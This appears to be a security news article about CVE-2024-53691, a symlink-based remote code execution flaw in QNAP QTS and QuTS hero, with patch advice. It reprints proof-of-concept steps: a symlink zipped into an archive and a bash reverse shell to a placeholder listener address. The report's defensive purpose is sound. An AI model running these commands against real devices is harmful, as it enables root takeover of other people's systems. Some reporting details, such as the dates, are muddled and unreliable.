A critical remote code execution (RCE) vulnerability, tracked as CVE-2024-53691, has recently come to light, affecting users of QNAP’s QTS and QuTS Hero operating systems.
This vulnerability enables remote attackers with user access privileges to traverse the file system and run arbitrary code on affected systems.
With a CVSS score of 8.7, the severity of this vulnerability underscores the urgent need for QNAP users to apply recommended updates.
As reported on April 22, 2024, CVE-2024-53691 allows attackers to exploit a link following a vulnerability.
By leveraging their existing access rights, they can upload a symbolic link through a ZIP file and manipulate the system’s encrypt/decrypt functions to achieve arbitrary file write capabilities.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free
This exploitation can escalate the attacker’s privileges and result in full system compromise, executing code as the root user.
The vulnerability primarily affects QTS versions 5.1.x and QuTS hero h5.1.x. Patches were released on September 7, 2024, through the following fixed versions:
Affected Versions
Following the discovery, a proof-of-concept (PoC) exploit has been released by Github, demonstrating the exploitation of CVE-2024-53691.
The exploit involves several key steps, beginning with creating a symbolic link to an executable file that the attacker can use to gain shell access. Below is an overview of the process:
ln -s /home/httpd/cgi-bin/restore_config.cgi link.txt
zip --symlink pwn.zip link.txt
#!/bin/sh
bash -c "bash -i >& /dev/tcp/<listener_ip>/<listener_port> 0>&1" &
QNAP strongly advises users to update their systems to fixed versions as soon as possible to mitigate potential risks associated with this vulnerability. To update:
Users should also regularly monitor their devices for any unauthorized access and implement additional security measures such as network firewalls and intrusion detection systems.
The disclosure of CVE-2024-53691 highlights the importance of cybersecurity vigilance and the need for regular software updates.
By taking proactive steps to secure their devices, QNAP users can protect themselves from potential exploitation of this serious vulnerability.
Integrating Application Security into Your CI/CD Workflows Using Jenkins & Jira -> Free Webinar
Brinker, an innovative narrative intelligence platform dedicated to combating disinformation and influence campaigns, has been…
A recent investigation by cybersecurity researchers has uncovered a large-scale malware campaign leveraging the DeepSeek…
A recent malware campaign has been observed targeting the First Ukrainian International Bank (PUMB), utilizing…
A newly discovered malware, dubbed Trojan.Arcanum, is targeting enthusiasts of tarot, astrology, and other esoteric…
A sophisticated phishing campaign orchestrated by a Russian-speaking threat actor has been uncovered, revealing the…
A sophisticated malware campaign has compromised over 1,500 PostgreSQL servers, leveraging fileless techniques to deploy…